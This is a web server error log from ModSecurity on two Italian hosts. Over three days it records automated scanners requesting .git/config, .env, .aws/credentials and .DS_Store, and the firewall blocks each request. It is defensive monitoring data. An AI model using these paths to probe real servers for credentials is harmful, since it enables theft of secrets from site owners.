[Tue Oct 07 12:00:28.627709 2025] [:error] [pid 3292642] [client 195.178.110.155:50455] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvKFxGzuZqc-552mgggAAAAM"]
[Tue Oct 07 12:00:28.627945 2025] [:error] [pid 3292642] [client 195.178.110.155:50455] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvKFxGzuZqc-552mgggAAAAM"]
[Tue Oct 07 12:00:28.628116 2025] [:error] [pid 3292642] [client 195.178.110.155:50455] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvKFxGzuZqc-552mgggAAAAM"]
[Tue Oct 07 12:00:28.743142 2025] [:error] [pid 3292666] [client 195.178.110.155:59970] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvEs4gNmRHyJU041HAgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Tue Oct 07 12:00:28.743369 2025] [:error] [pid 3292666] [client 195.178.110.155:59970] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvEs4gNmRHyJU041HAgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Tue Oct 07 12:00:28.743534 2025] [:error] [pid 3292666] [client 195.178.110.155:59970] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOTkvEs4gNmRHyJU041HAgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Oct 08 06:00:30.276216 2025] [:error] [pid 3317609] [client 161.178.137.240:50248] [client 161.178.137.240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOXh3uosKisOh7QczZoqDQAAAAg"]
[Wed Oct 08 06:00:30.276469 2025] [:error] [pid 3317609] [client 161.178.137.240:50248] [client 161.178.137.240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOXh3uosKisOh7QczZoqDQAAAAg"]
[Wed Oct 08 06:00:30.276631 2025] [:error] [pid 3317609] [client 161.178.137.240:50248] [client 161.178.137.240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOXh3uosKisOh7QczZoqDQAAAAg"]
[Wed Oct 08 06:01:35.543973 2025] [:error] [pid 3317570] [client 161.178.137.240:63848] [client 161.178.137.240] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOXiH3sCKURmj2K7u-Q9wQAAAAI"]
[Wed Oct 08 06:01:35.544250 2025] [:error] [pid 3317570] [client 161.178.137.240:63848] [client 161.178.137.240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOXiH3sCKURmj2K7u-Q9wQAAAAI"]
[Wed Oct 08 06:01:35.544416 2025] [:error] [pid 3317570] [client 161.178.137.240:63848] [client 161.178.137.240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOXiH3sCKURmj2K7u-Q9wQAAAAI"]
[Wed Oct 08 21:30:51.477278 2025] [:error] [pid 3325141] [client 213.209.157.93:44712] [client 213.209.157.93] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOa760zJhLpqvtTEaynS5QAAAAk"]
[Wed Oct 08 21:30:51.478462 2025] [:error] [pid 3325141] [client 213.209.157.93:44712] [client 213.209.157.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOa760zJhLpqvtTEaynS5QAAAAk"]
[Wed Oct 08 21:30:51.478632 2025] [:error] [pid 3325141] [client 213.209.157.93:44712] [client 213.209.157.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOa760zJhLpqvtTEaynS5QAAAAk"]
[Thu Oct 09 05:55:44.977729 2025] [:error] [pid 3341540] [client 68.183.231.190:56398] [client 68.183.231.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOcyQL1WH5EBEw25GuVwzgAAAAE"]
[Thu Oct 09 05:55:44.978009 2025] [:error] [pid 3341540] [client 68.183.231.190:56398] [client 68.183.231.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOcyQL1WH5EBEw25GuVwzgAAAAE"]
[Thu Oct 09 05:55:44.978707 2025] [:error] [pid 3341540] [client 68.183.231.190:56398] [client 68.183.231.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOcyQL1WH5EBEw25GuVwzgAAAAE"]
[Thu Oct 09 08:59:20.358459 2025] [:error] [pid 3341542] [client 180.252.134.148:63216] [client 180.252.134.148] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aOddSEIgU6d6fBj_ZBFkxQAAAAM"]
[Thu Oct 09 08:59:20.358727 2025] [:error] [pid 3341542] [client 180.252.134.148:63216] [client 180.252.134.148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aOddSEIgU6d6fBj_ZBFkxQAAAAM"]
[Thu Oct 09 08:59:20.358894 2025] [:error] [pid 3341542] [client 180.252.134.148:63216] [client 180.252.134.148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aOddSEIgU6d6fBj_ZBFkxQAAAAM"]
[Thu Oct 09 08:59:21.078231 2025] [:error] [pid 3341539] [client 180.252.134.148:55700] [client 180.252.134.148] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aOddSTttNx0EK3b2iUqwjwAAAAA"]
[Thu Oct 09 08:59:21.078479 2025] [:error] [pid 3341539] [client 180.252.134.148:55700] [client 180.252.134.148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aOddSTttNx0EK3b2iUqwjwAAAAA"]
[Thu Oct 09 08:59:21.078631 2025] [:error] [pid 3341539] [client 180.252.134.148:55700] [client 180.252.134.148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aOddSTttNx0EK3b2iUqwjwAAAAA"]
[Thu Oct 09 14:55:32.303065 2025] [authz_core:error] [pid 3355977] [client 172.235.183.127:39212] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Oct 09 14:55:32.663166 2025] [:error] [pid 3341541] [client 172.235.183.127:44320] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aOewxFQRj86BxKqN4S8BQQAAAAI"]
[Thu Oct 09 14:55:32.663372 2025] [:error] [pid 3341541] [client 172.235.183.127:44320] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aOewxFQRj86BxKqN4S8BQQAAAAI"]
[Thu Oct 09 14:55:32.663525 2025] [:error] [pid 3341541] [client 172.235.183.127:44320] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aOewxFQRj86BxKqN4S8BQQAAAAI"]
[Thu Oct 09 14:55:32.738829 2025] [:error] [pid 3355972] [client 172.235.183.127:44324] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOewxEMdIDqv64mmoTWe0AAAAAg"]
[Thu Oct 09 14:55:32.739036 2025] [:error] [pid 3355972] [client 172.235.183.127:44324] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOewxEMdIDqv64mmoTWe0AAAAAg"]
[Thu Oct 09 14:55:32.739182 2025] [:error] [pid 3355972] [client 172.235.183.127:44324] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOewxEMdIDqv64mmoTWe0AAAAAg"]
[Thu Oct 09 14:55:32.804646 2025] [:error] [pid 3355978] [client 172.235.183.127:44338] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOewxLU1wryqrxL8M2fSMwAAAA4"]
[Thu Oct 09 14:55:32.804851 2025] [:error] [pid 3355978] [client 172.235.183.127:44338] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOewxLU1wryqrxL8M2fSMwAAAA4"]
[Thu Oct 09 14:55:32.805027 2025] [:error] [pid 3355978] [client 172.235.183.127:44338] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOewxLU1wryqrxL8M2fSMwAAAA4"]
[Thu Oct 09 21:12:20.810679 2025] [authz_core:error] [pid 3359244] [client 172.235.183.127:49846] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Oct 09 21:12:22.273231 2025] [:error] [pid 3358693] [client 172.235.183.127:49884] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aOgJFjAxZ17-YIO-YAoGIAAAAAI"]
[Thu Oct 09 21:12:22.273427 2025] [:error] [pid 3358693] [client 172.235.183.127:49884] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aOgJFjAxZ17-YIO-YAoGIAAAAAI"]
[Thu Oct 09 21:12:22.273572 2025] [:error] [pid 3358693] [client 172.235.183.127:49884] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aOgJFjAxZ17-YIO-YAoGIAAAAAI"]
[Thu Oct 09 21:12:22.338058 2025] [:error] [pid 3358695] [client 172.235.183.127:49892] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgJFjnEr3H4ziXIqlZtwwAAAAU"]
[Thu Oct 09 21:12:22.338253 2025] [:error] [pid 3358695] [client 172.235.183.127:49892] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgJFjnEr3H4ziXIqlZtwwAAAAU"]
[Thu Oct 09 21:12:22.338762 2025] [:error] [pid 3358695] [client 172.235.183.127:49892] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgJFjnEr3H4ziXIqlZtwwAAAAU"]
